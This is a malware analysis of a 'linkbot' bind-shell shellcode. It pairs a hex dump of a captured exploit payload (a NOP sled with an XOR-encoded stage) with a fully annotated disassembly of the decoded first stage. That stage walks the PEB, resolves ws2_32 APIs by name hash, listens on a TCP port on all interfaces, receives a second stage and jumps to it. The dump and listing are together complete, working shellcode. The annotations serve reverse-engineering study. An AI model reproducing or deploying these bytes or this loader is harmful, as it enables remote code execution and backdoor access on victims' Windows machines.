Reference: ce332d14e71a09b192fa98ee1b030d15.bin
00000000 05 00 00 03 10 00 00 00 8a 06 00 00 00 00 00 00 |................| 00000010 72 06 00 00 00 00 00 00 05 00 01 00 00 00 00 00 |r...............| 00000020 00 00 00 00 58 7d 75 75 40 eb c6 47 bc 71 4e a7 |....X}uu@..G.qN.| 00000030 1c d0 b5 97 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00000040 00 00 00 00 00 00 00 00 00 00 09 00 00 03 00 00 |................| 00000050 00 00 00 00 00 03 00 00 5c 00 5c 00 90 90 90 90 |........\.\.....| 00000060 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................| 00000070 90 90 90 90 90 90 90 90 90 90 90 90 eb 10 eb 19 |................| 00000080 9f 75 18 00 23 37 f3 77 eb e0 fd 7f 90 90 90 90 |.u..#7.w........| 00000090 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................| * 000000e0 90 90 90 90 eb 04 ff ff ff ff 90 90 90 90 90 90 |................| 000000f0 90 90 eb 04 eb 04 90 90 90 90 eb 04 ff ff ff ff |................| 00000100 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................| * 00000400 90 90 90 90 eb 15 b9 8b e6 13 41 81 f1 4d e6 13 |..........A..M..| 00000410 41 5e 80 74 31 ff 42 e2 f9 eb 05 e8 e6 ff ff ff |A^.t1.B.........| 00000420 71 99 26 c9 01 72 c9 02 4e c9 32 5e ef c9 3a 4a |q.&..r..N.2^..:J| 00000430 aa 07 42 42 42 11 14 c9 1d 7e c9 1e 79 3a 41 9d |..BBB....~..y:A.| 00000440 11 c9 19 62 41 9d 11 c1 81 46 c9 71 41 b5 71 8b |...bA....F.qA.q.| 00000450 ee 70 8a 83 83 47 c6 82 37 b4 69 88 37 ab 1a 69 |.p...G..7.i.7..i| 00000460 9a 93 a9 1c 41 1c 66 41 9d 24 c9 49 c9 1c 5e 41 |....A.fA.$.I..^A| 00000470 9d c9 46 c9 41 85 1c 19 bd a2 1c 2a 71 70 42 42 |..F.A......*qpBB| 00000480 2a 35 31 70 1d 16 f8 d0 2c 46 c6 bd 94 c9 ba c3 |*51p....,F......| 00000490 ae 42 40 42 42 c9 ae 11 28 43 28 40 f8 c1 11 c1 |.B@BB...(C(@....| 000004a0 42 bd 94 11 11 11 2a 40 42 e2 e1 c9 96 c9 9a 28 |B.....*@B......(| 000004b0 52 10 11 f8 42 d2 e4 80 bd 94 02 12 11 f8 38 79 |R...B.........8y| 000004c0 31 e3 bd 94 12 12 11 f8 52 91 2b 42 bd 94 c9 9a |1.......R.+B....| 000004d0 71 82 12 
f6 40 12 17 11 f8 42 1a 22 a0 bd 94 fd |q...@....B."....| 000004e0 97 a2 84 30 bd a7 6b 63 71 6b 62 6e 66 66 69 64 |...0..kcqkbnffid| 000004f0 6d 72 64 76 77 70 6c 72 62 61 67 6c 66 63 62 65 |mrdvwplrbaglfcbe| 00000500 76 63 77 7a 7a 64 77 72 6e 61 78 71 6c 64 70 73 |vcwzzdwrnaxqldps| 00000510 6f 62 64 71 64 77 79 71 79 69 63 69 72 69 6b 69 |obdqdwyqyiciriki| 00000520 75 66 64 69 73 73 62 72 6e 6c 72 69 6b 72 6e 69 |ufdissbrnlrikrni| 00000530 61 6d 68 79 71 68 70 68 65 63 62 7a 74 78 72 75 |amhyqhphecbztxru| 00000540 6c 74 75 6d 79 62 6b 67 6c 70 61 6a 6b 73 75 71 |ltumybkglpajksuq| 00000550 61 6b 68 6a 65 72 67 61 6d 72 6c 76 70 75 79 6a |akhjergamrlvpuyj| 00000560 66 69 6f 68 7a 72 75 79 72 6b 70 6e 61 6f 70 78 |fiohzruyrkpnaopx| 00000570 7a 76 73 66 61 62 6e 6d 74 6f 63 68 68 6a 69 63 |zvsfabnmtochhjic| 00000580 79 64 67 62 7a 67 66 72 66 6f 73 7a 6d 73 72 74 |ydgbzgfrfoszmsrt| 00000590 6d 66 6e 6a 6f 76 6a 6a 76 66 78 6d 78 64 76 67 |mfnjovjjvfxmxdvg| 000005a0 73 73 6c 64 72 66 6f 63 6b 68 7a 6f 77 6f 71 79 |ssldrfockhzowoqy| 000005b0 62 69 6d 77 70 73 7a 6c 65 72 6c 73 61 6d 68 76 |bimwpszlerlsamhv| 000005c0 6e 75 65 67 76 71 75 77 71 78 6c 6b 64 6b 62 75 |nuegvquwqxlkdkbu| 000005d0 6d 65 8b 45 30 05 24 fb ff ff ff e0 eb f4 77 75 |me.E0.$.......wu| 000005e0 0b 0b 1b 00 77 68 72 6e 70 76 6c 63 61 74 78 6f |....whrnpvlcatxo| 000005f0 6a 6d 6b 76 6c 6b 6a 7a 63 66 63 76 64 68 75 76 |jmkvlkjzcfcvdhuv| 00000600 79 73 78 6b 6e 71 6f 7a 68 71 62 68 6a 74 6b 6e |ysxknqozhqbhjtkn| 00000610 70 6e 78 74 6c 77 6b 75 eb 06 61 69 59 1c 00 01 |pnxtlwku..aiY...| 00000620 8b 44 24 fc 05 e0 fa ff ff ff e0 62 6c 77 66 6e |.D$........blwfn| 00000630 67 6b 6b 62 61 6c 6e 69 69 73 64 73 6d 73 61 6b |gkkbalniisdsmsak| 00000640 64 66 61 7a 6c 71 74 70 61 61 74 66 69 78 5c 00 |dfazlqtpaatfix\.| 00000650 41 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 |A...............| 00000660 00 00 00 00 01 00 00 00 68 1c 09 00 01 00 00 00 |........h.......| 00000670 00 00 00 00 00 00 00 00 c0 00 00 
00 00 00 00 46 |...............F| 00000680 01 00 00 00 01 00 00 00 07 00 |..........|
This shellcode is the bind variant of the two-stage linkbot shellcode. In the dump above it sits behind a short XOR decoder at offset 0x404 (`mov ecx,0x4113e68b` / `xor ecx,0x4113e64d` leaves a count of 0xc6, then `xor byte [esi+ecx-1],0x42` in a `loop`; the `call` pushes 0x420 as the payload start), and 0xc6 = 198 bytes is exactly the span of the listing below (00402095–0040215a), so the listing is the decoded first stage. Note that the listing is a representative disassembly from another instance ("bremen"): spot-checked instructions decode to the same bytes, but the two per-sample immediates differ — this dump pushes 0xa3a00002 for the sockaddr (sin_port bytes a0 a3 = TCP port 41123, not the listing's 0xd63a = 54842) and loads 0x72c6e0d5 rather than 0xc074f11c into edi before the jump. The stage resolves ws2_32 imports by name hash, listens on all interfaces, accepts one connection, reads up to 0x200 bytes of second stage into a stack buffer and jumps to it without checking a single return value.
; First stage of the bind variant (00402095-0040215a, 0xc6 bytes). Flow: find a module via the
; PEB loader list, resolve APIs by a ROL5/XOR name hash, LoadLibraryA("ws2_32"), then
; socket/bind/listen/accept/recv one 0x200-byte second stage into a stack buffer and jump to it.
; No API return value is ever tested, so every failure falls straight through into the next call.
00402095 33db xor ebx,ebx                               ; ebx = 0; reused below as protocol=0 and as the sockaddr_in zero words
00402097 64:8b43 30 mov eax,dword ptr fs:[ebx+30]       ; fs:[30h] = PEB (32-bit Windows)
0040209b 8b40 0c mov eax,dword ptr ds:[eax+c]           ; PEB+0Ch = Ldr
0040209e 8b70 1c mov esi,dword ptr ds:[eax+1c]          ; Ldr+1Ch = InInitializationOrderModuleList.Flink (first entry)
004020a1 ad lods dword ptr ds:[esi]                     ; eax = that entry's Flink, i.e. the SECOND module in init order
004020a2 8b78 08 mov edi,dword ptr ds:[eax+8]           ; edi = its DllBase (entry+8)
                                                        ; NOTE(review): the LoadLibraryA lookup below assumes this image is
                                                        ; kernel32.dll, which holds for XP/2003-era list ordering; there is no
                                                        ; fallback if the hash is absent from whatever module sits here
004020a5 e8 45000000 call bremen.004020ef               ; pushes 004020aa and continues at 004020ef, which pops it: esi = &resolver
; --- resolver (entered via 'call esi'): edx = wanted hash, edi = module base. Tail-jumps into the
; --- API, whose stdcall ret returns to the original caller. ebx/esi preserved, eax/ecx clobbered.
004020aa 53 push ebx
004020ab 56 push esi
004020ac 8b5f 3c mov ebx,dword ptr ds:[edi+3c]          ; e_lfanew
004020af 8b5c3b 78 mov ebx,dword ptr ds:[ebx+edi+78]    ; DataDirectory[EXPORT].VirtualAddress
004020b3 03df add ebx,edi                               ; ebx = IMAGE_EXPORT_DIRECTORY
004020b5 53 push ebx                                    ; save export directory
004020b6 8b5b 20 mov ebx,dword ptr ds:[ebx+20]          ; AddressOfNames RVA
004020b9 03df add ebx,edi
004020bb 53 push ebx                                    ; save &AddressOfNames[0]
004020bc 83c3 04 add ebx,4                              ; advances BEFORE the first compare: AddressOfNames[0] is never hashed
004020bf 8b33 mov esi,dword ptr ds:[ebx]                ; name RVA
004020c1 03f7 add esi,edi                               ; esi -> ASCIIZ export name
004020c3 33c9 xor ecx,ecx                               ; hash = 0
004020c5 ac lods byte ptr ds:[esi]
004020c6 32c8 xor cl,al                                 ; hash ^= byte (low 8 bits only)
004020c8 c1c1 05 rol ecx,5                              ; hash = rol(hash, 5)
004020cb 84c0 test al,al
004020cd ^75 f6 jnz short bremen.004020c5               ; exits only after the NUL has been folded in, so the terminator is part of the hash
004020cf 2bca sub ecx,edx                               ; ecx = hash - wanted
004020d1 ^75 e9 jnz short bremen.004020bc               ; no match -> next name. No NumberOfNames ([esi+18h]) bound is checked:
                                                        ; a hash that is not in this module walks off the end of the table
004020d3 58 pop eax                                     ; &AddressOfNames[0]
004020d4 2bd8 sub ebx,eax                               ; byte offset of the match = index*4
004020d6 d1eb shr ebx,1                                 ; index*2 = byte offset into the WORD ordinal table
004020d8 5e pop esi                                     ; export directory
004020d9 035e 24 add ebx,dword ptr ds:[esi+24]          ; AddressOfNameOrdinals RVA
004020dc 03df add ebx,edi
004020de 66:8b0b mov cx,word ptr ds:[ebx]               ; ecx = ordinal (upper 16 bits are 0: ecx was 0 after the matching sub)
004020e1 8b5e 1c mov ebx,dword ptr ds:[esi+1c]          ; AddressOfFunctions RVA
004020e4 03df add ebx,edi
004020e6 8b048b mov eax,dword ptr ds:[ebx+ecx*4]        ; function RVA
004020e9 03c7 add eax,edi                               ; eax = function VA
004020eb 5e pop esi
004020ec 5b pop ebx
004020ed -ffe0 jmp eax                                  ; tail call: the API's own ret lands after the caller's 'call esi'
; --- main body (reached once, via the call at 004020a5)
004020ef 5e pop esi                                     ; esi = 004020aa = resolver entry
004020f0 68 33320000 push 3233                          ; "32\0\0"
004020f5 68 7773325f push 5f327377                      ; "ws2_"  -> "ws2_32" on the stack
004020fa 54 push esp                                    ; lpLibFileName
004020fb ba 926e0484 mov edx,84046e92                   ; hash, looked up in the module found at 004020a2
00402100 ffd6 call esi ; loadlibrarya()
00402102 8bf8 mov edi,eax                               ; edi = ws2_32.dll base: every later lookup hashes ws2_32's export names
00402104 81ec 00020000 sub esp,200                      ; 0x200-byte stack buffer for the second stage
0040210a 8bec mov ebp,esp                               ; ebp = buffer; also the final jump target
0040210c 53 push ebx                                    ; protocol = 0
0040210d 6a 01 push 1                                   ; type = SOCK_STREAM
0040210f 6a 02 push 2                                   ; af = AF_INET
00402111 ba 83538300 mov edx,835383
00402116 ffd6 call esi ; socket()
00402118 53 push ebx                                    ; sockaddr_in: sin_zero[4..7] = 0
00402119 53 push ebx                                    ;              sin_zero[0..3] = 0
0040211a 53 push ebx                                    ;              sin_addr = 0.0.0.0 (INADDR_ANY: listens on every interface)
0040211b 68 0200d63a push 3ad60002                      ; sin_family = 2 (AF_INET); sin_port bytes d6 3a in network order
                                                        ; = TCP port 0xd63a = 54842 ("3ad6" is only how the immediate prints).
                                                        ; Per-sample value: the dump above pushes 0xa3a00002 instead (port 41123)
00402120 8bd4 mov edx,esp                               ; edx = &sockaddr_in
00402122 8bd8 mov ebx,eax                               ; ebx = listening socket; socket() failure is not detected
00402124 6a 10 push 10                                  ; namelen = 16 = sizeof(sockaddr_in)
00402126 52 push edx                                    ; name
00402127 53 push ebx                                    ; s
00402128 ba 0090a6c2 mov edx,c2a69000
0040212d ffd6 call esi ; bind()
0040212f 40 inc eax                                     ; bind() returns 0 on success -> backlog = 1; on -1 this yields 0 and execution continues anyway
00402130 50 push eax                                    ; backlog
00402131 53 push ebx                                    ; s
00402132 ba 7a3b73a1 mov edx,a1733b7a
00402137 ffd6 call esi ; listen()
00402139 50 push eax                                    ; addrlen = listen() result (NULL only if listen() succeeded)
0040213a 50 push eax                                    ; addr    = same value
0040213b 53 push ebx                                    ; s
0040213c ba 10d36900 mov edx,69d310
00402141 ffd6 call esi ; accept()                       ; blocks for one peer; the returned socket is used unchecked
00402143 8bd8 mov ebx,eax                               ; ebx = connected socket, left in ebx for the next stage
00402145 33c0 xor eax,eax
00402147 50 push eax                                    ; flags = 0
00402148 b4 02 mov ah,2                                 ; eax = 0x200
0040214a 50 push eax                                    ; len = 0x200, matches the buffer reserved at 00402104
0040214b 55 push ebp                                    ; buf
0040214c 53 push ebx                                    ; s
0040214d ba 005860e2 mov edx,e2605800
00402152 ffd6 call esi ; recv()                         ; single recv; the byte count is never checked, so a short or failed read still falls through
00402154 bf 1cf174c0 mov edi,c074f11c                   ; "authentication key" per the original annotation; this stage never compares it -
                                                        ; presumably handed to the second stage in edi (confirm against stage 2).
                                                        ; Per-sample value: the dump above loads 0x72c6e0d5
00402159 ffe5 jmp ebp                                   ; execute whatever landed in the stack buffer, exactly as received